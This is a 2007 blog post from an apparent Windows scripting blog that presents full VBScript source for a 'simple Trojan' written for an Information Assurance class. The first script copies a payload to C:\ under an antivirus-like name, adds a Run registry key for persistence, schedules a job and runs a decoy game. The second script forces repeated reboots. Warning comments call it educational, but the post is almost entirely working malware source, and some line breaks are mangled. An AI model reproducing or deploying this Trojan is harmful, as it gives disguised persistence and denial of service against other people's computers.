Windows Scripting BLOG

Due to limited time working on this project this place is not intended to people who are new to scripting but much more for people who are already familiar with the VBS/WMI syntax.

Samstag, 22. Dezember 2007

Example of a simple Trojan I've created for an Information Assurance class

' IMPORTANT! do NOT use this script on your computer or it could easily damage your system
'Also, this script has been written to demonstrate the concept of trojan horses/viruses - it should ' NOT be used in malicious fashion but only for educational purposes on isolated systems

'File 1 Romcs.vbs

HKEY_LOCAL_MACHINE = &H80000002strComputer = "."
Set WSHShell = CreateObject("Scripting.FilesystemObject")
WSHShell.CopyFile"AntiVirusNet.vbs", "C:\AntiVirusNet.vbs"
Set ObjRegistry = GetObject("winmgmts:{impersonationLevel = impersonate}!\\" & _ strComputer & "\root\default:StdRegProv")
Return = objRegistry.setStringValue(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","WRSPXPBXUpd","C:\AntiVirusNet.vbs" )
If Return <> 0 Then
msgbox("Keine Admin Rights!") Else
Set objWMIService1 = GetObject("winmgmts:" _& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers3 = objWMIService1.ExecQuery _("Select * from Win32_LocalTime")For Each objComputer2 in colComputers3
Hou = objComputer2.HourMin = objComputer2.Minute
if Hou < 10 thenHou = 0 & objComputer2.Hour
end ifnext
if Min < 10 thenMin = 0 & objComputer2.Minuteend if

Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers2 = objWMIService.Get("Win32_ScheduledJob")T = "C:\AntiVirusNet.vbs"D = "********" & Hou & "" & Min & "00.000000+000" '+1 hour automatically
erret = colComputers2.Create(T,D,JobID1000)Set WSHShell1 = CreateObject("WScript.Shell")
WSHShell1.Run "bowling.exe"'WSHShell.DeleteFile ("*.vsbs")
End IF

' File 2 AntiVirusNet.vbs

On error resume next
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers2 = objWMIService.ExecQuery _ ("Select * from Win32_OperatingSystem")For Each objComputer2 in colComputers2objComputer2.Security_.privileges.AddAsString "SeShutdownPrivilege", trueerrRet = objComputer2.Reboot()
next

Keine Kommentare: